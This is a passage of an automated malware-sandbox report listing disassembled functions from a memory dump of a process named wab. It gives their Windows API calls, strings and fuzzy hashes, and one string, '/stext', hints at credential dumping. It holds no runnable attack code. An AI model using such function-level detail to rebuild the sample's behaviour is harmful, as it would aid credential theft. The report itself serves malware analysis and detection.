                                                                                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1161345128-0
                                                                                                                                                • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID: /stext
                                                                                                                                                • API String ID: 2081463915-3817206916
                                                                                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 159017214-0
                                                                                                                                                • Opcode ID: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                • Opcode Fuzzy Hash: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3150196962-0
                                                                                                                                                • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: malloc
                                                                                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                                                                                • API String ID: 2803490479-1168259600
                                                                                                                                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 4a6bf56a3c8e18f25b9487746213253c86c510b1b99403974ad2cc9a69351a87
                                                                                                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                • Opcode Fuzzy Hash: 4a6bf56a3c8e18f25b9487746213253c86c510b1b99403974ad2cc9a69351a87
                                                                                                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 536c2047bffc8dd9b34700d623eb618271f55ea3451f57cc7c37cab4f8277461
                                                                                                                                                • Instruction ID: 93a37c1a4f050773dc1a5674df64ec50811fc8a39a1cc3e4a9db11821b00e242
                                                                                                                                                • Opcode Fuzzy Hash: 536c2047bffc8dd9b34700d623eb618271f55ea3451f57cc7c37cab4f8277461
                                                                                                                                                • Instruction Fuzzy Hash: A0B012310281004DEB057BA1B8061142302C64332E3B3413FE000500A3DE5D6034140F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1065087418-0
                                                                                                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                • memcpy.MSVCRT ref: 00406E09
                                                                                                                                                • memcpy.MSVCRT ref: 00406E5A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$??2@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3700833809-0
                                                                                                                                                • Opcode ID: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                • Opcode Fuzzy Hash: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1297977491-0
                                                                                                                                                • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                  • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1481295809-0
                                                                                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3150196962-0
                                                                                                                                                • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$PointerRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3154509469-0
                                                                                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4232544981-0
                                                                                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3859505661-0
                                                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 708d35572adfbd8c0afef1fefac48864b5998db401338d2add0cc9d49b5fd8aa
                                                                                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                • Opcode Fuzzy Hash: 708d35572adfbd8c0afef1fefac48864b5998db401338d2add0cc9d49b5fd8aa
